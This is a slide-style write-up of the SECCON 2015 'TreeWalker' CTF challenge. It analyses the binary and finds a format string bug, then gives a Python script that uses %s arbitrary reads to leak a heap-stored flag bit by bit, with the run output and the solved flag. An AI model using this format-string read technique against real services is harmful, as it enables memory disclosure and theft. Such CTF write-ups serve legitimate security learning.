fsb: treewalker - seccon 2015 online ctf

17
FSB: TreeWalker Exploit 200 points - SECCON 2015 Online CTF you0708@YOKARO-MON

Upload: yokaro-mon

Posted on 21-Jan-2017


Page 1: FSB: TreeWalker - SECCON 2015 Online CTF


Page 2

treewalker.pwn.seccon.jp 20000

Page 3

Surface Analysis

• ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped

• Arch: amd64-64-little

• RELRO: No RELRO

• Stack: No canary found

• NX: NX enabled

• PIE: No PIE

• FORTIFY: Enabled

Page 4

Dynamic Analysis

# ./treewalker
0000000000c69010
ABCDEFGHIJKLMN
vulnserver.c(77): Invalid input
# IJKLMN
bash: IJKLMN: command not found
#

Address? (the program prints an address before it reads any input)

Read only 8 bytes: the program consumed "ABCDEFGH" only, and the rest of the line ("IJKLMN") was left behind and picked up by the shell.

Page 5

Static Analysis

• Main function

Is the address given by the program related to the flag?

Page 6

Static Analysis

• construct_tree

Page 7

Static Analysis

• construct_tree

[Diagram on the slide: three Leaf nodes. Each Leaf holds Flag = 0x49 ('I') or 0x4C ('L'), followed by two slots labelled 0 and 1; one slot holds the address of the Child and the other holds 0. First Leaf: Flag = 0x49, slot 0 = 0, slot 1 = Child. Second Leaf: Flag = 0x49, slot 0 = Child, slot 1 = 0. Last Leaf: Flag = 0x4C, both slots 0.]

Page 8

Static Analysis

• construct_tree

[Diagram on the slide: the tree built by construct_tree, drawn as Leaf nodes joined by edges labelled 0 and 1; the path labels shown are 01, 01, 00, 01, ..., F, ending at a node marked "Leaf End".]

Page 9

Static Analysis

• Main function

1. The first 8 bytes of the input are the "size"

2. The input data is printed back through ___printf_chk

Page 10

Static Analysis

[Diagram on the slide: the main loop. Input = an 8-byte size (0x0000000000000004) followed by the data ("hoge"); "hoge" is echoed back, the address the program prints is labelled "flag address", and the program loops.]

Page 11

Vulnerability

• FSB = Format String Bug

Address printed by the program: 0000000000602010

After sending "%08x" * 30:

00000078f7b175c000000b40ffffcff00000000000000078cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc78383025

The annotated final word 78383025 is "%08x" itself (bytes 25 30 38 78, little-endian): the input buffer has been reached on the stack.

Page 12

Exploit

Page 13

Understanding Heap Layout

• Heap chunks

[Diagram on the slide: one chunk = [Chunk size + PREV_INUSE] [Flag = 0x49] [0 or Address of child]]

Page 14

Information Leakage

• Using format string bug

[Diagram on the slide: three Leaf nodes (Flag = 0x49, 0, Child) read through the format string. Offsets: first leaf at the given address; second leaf at the given address + 0x18 (size of leaf) + 0x08 (size of chunk header); third leaf at the given address + 0x40. For each leaf two values are leaked: the flag (0x49 or 0x4C) and the child slot (zero or not).]

Page 15

exploit.py (indentation reconstructed from the slide; the socket setup and the pQ / read_until helpers are not shown on the slide and are reconstructed here)

import socket
import struct

def pQ(x):
    # pack a 64-bit little-endian value (reconstructed helper)
    return struct.pack('<Q', x)

def read_until(f, delim):
    # read from the socket file until delim has been seen (reconstructed helper)
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

s = socket.create_connection(('treewalker.pwn.seccon.jp', 20000))
f = s.makefile('rw', 0)
addr = int(f.readline().strip(), 16)    # the program prints the flag-related address first
print("[*] addr: %016x" % addr)

flag = ""
flag_next = ""
while flag_next != "L":
    c = 0
    for i in range(8):
        c = c << 1
        buf = '%08x' * 32           # walk up the stack to where the input buffer sits
        buf += ' !%s! '             # %s dereferences the first pointer appended below
        buf += ' !%s! '             # %s dereferences the second pointer
        buf += pQ(addr)             # leaf flag (0x49 'I' or 0x4C 'L')
        buf += pQ(addr + 8)         # child slot (zero or not)
        f.write(pQ(len(buf)) + buf) # the first 8 bytes of the input are the size
        read_until(f, ' !')
        flag_next = read_until(f, '! ')[:-3]
        read_until(f, ' !')
        child = read_until(f, '! ')[:-3]
        if flag_next == 'L':
            break
        if child:
            bit = 1
        else:
            bit = 0
        print bit,
        c += bit
        addr += 0x20                # next leaf: 0x18 leaf + 0x08 chunk header
    else:
        print ""
        flag += chr(c)
print("[*] flag: %s" % flag)

Page 16

$ python exploit.py
[*] addr: 0000000000602010
0 1 0 1 0 0 1 1
0 1 0 0 0 1 0 1
0 1 0 0 0 0 1 1
0 1 0 0 0 0 1 1
0 1 0 0 1 1 1 1
0 1 0 0 1 1 1 0
0 1 1 1 1 0 1 1
0 0 1 1 0 1 0 0
0 1 1 1 0 0 1 0
0 1 1 0 0 0 1 0
0 0 1 1 0 0 0 1
0 0 1 1 0 1 1 1
0 1 0 1 0 0 1 0
0 1 0 0 0 0 0 0
0 1 1 1 0 0 1 0
0 1 0 1 1 0 0 1
0 1 0 1 0 0 1 0
0 1 1 0 0 1 0 1
0 1 0 0 0 0 0 1
0 1 1 0 0 1 0 0
0 1 1 1 1 1 0 1
[*] flag: SECCON{4rb17R@rYReAd}

Page 17

Thank you!